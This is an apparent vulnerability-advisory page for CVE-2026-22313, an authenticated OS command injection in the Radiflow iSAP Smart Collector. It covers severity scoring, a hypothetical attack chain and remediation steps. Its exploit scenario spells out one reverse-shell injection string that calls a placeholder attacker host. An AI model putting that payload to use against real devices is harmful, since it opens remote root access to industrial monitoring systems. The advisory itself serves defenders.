Skip to main content

Radiflow iSAP Smart Collector CVE-2026-22313

| EUVDEUVD-2026-37206 CRITICAL
OS Command Injection (CWE-78)
2026-06-16 ENISA GHSA-rvj8-j4f2-ffj6
9.1
CVSS 3.1 · Vendor: ENISA
Share

Severity by source

Vendor (ENISA) PRIMARY
9.1 CRITICAL
AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
vuln.today AI
9.1 CRITICAL

REST API is network-reachable on the management interface (AV:N, AC:L), requires a valid admin token (PR:H), no user interaction, and OS command execution as admin breaks out of the web app's authorization scope (S:C) with full CIA impact.

3.1 AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
4.0 AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

Primary rating from Vendor (ENISA).

CVSS VectorVendor: ENISA

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
High
User Interaction
None
Scope
Changed
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

2
Analysis Generated
Jun 16, 2026 - 19:49 vuln.today
CVE Published
Jun 16, 2026 - 18:36 cve.org
CRITICAL 9.1

DescriptionCVE.org

The device has a webserver that exposes a REST API authenticated with a token on the management network. By exploiting an OS command injection vulnerability an authenticated attacker can send arbitrary commands to the device that are executed with administrative permissions by the underlying operating system.

AnalysisAI

OS command injection in Radiflow iSAP Smart Collector allows an authenticated attacker on the management network to execute arbitrary commands with administrative (root-equivalent) privileges on the underlying operating system via the device's token-authenticated REST API. The CVSS 9.1 score reflects scope-changed impact across confidentiality, integrity, and availability, which is significant given the device's role as an OT/ICS data collector. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Reach management network
Delivery
Authenticate to REST API with stolen token
Exploit
Inject shell metacharacters into API parameter
Execution
Web server passes input to OS shell
Persist
Commands execute as administrative user
Impact
Pivot into OT monitoring data flows

Vulnerability AssessmentAI

Exploitation Exploitation requires (1) network reachability to the iSAP Smart Collector's management network where its REST API web server is exposed - not the OT/data-collection interface - and (2) possession of a valid administrative API bearer token, since the description and CVSS PR:H both confirm the affected endpoint is authenticated. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment Real-world risk is high but conditional. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker who has obtained a valid management API token - for example via a phishing-stolen operator credential, a leaked integration token in a backup, or lateral movement from a compromised engineering workstation that already speaks to the collector - sends a crafted REST API request whose parameter value contains shell metacharacters such as `; bash -i >& /dev/tcp/attacker/443 0>&1`. The underlying OS executes the injected command with administrative privileges, giving the attacker a root-level foothold on the OT monitoring appliance, from which they can disable telemetry, tamper with forwarded data to hide further intrusion, or pivot deeper into the segmented OT network. …
Remediation No vendor-released patch identified at time of analysis in the provided data, so operators should consult Radiflow PSIRT directly and monitor the CVCN advisory at https://www.cvcn.gov.it/cvcn/cve/CVE-2026-22313 for a fixed firmware version. … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

Within 24 hours: Restrict iSAP Smart Collector management network access using firewall rules and VLANs to approved administrative stations only; require out-of-band management channels (serial console or separate management network) where possible. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-22313 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy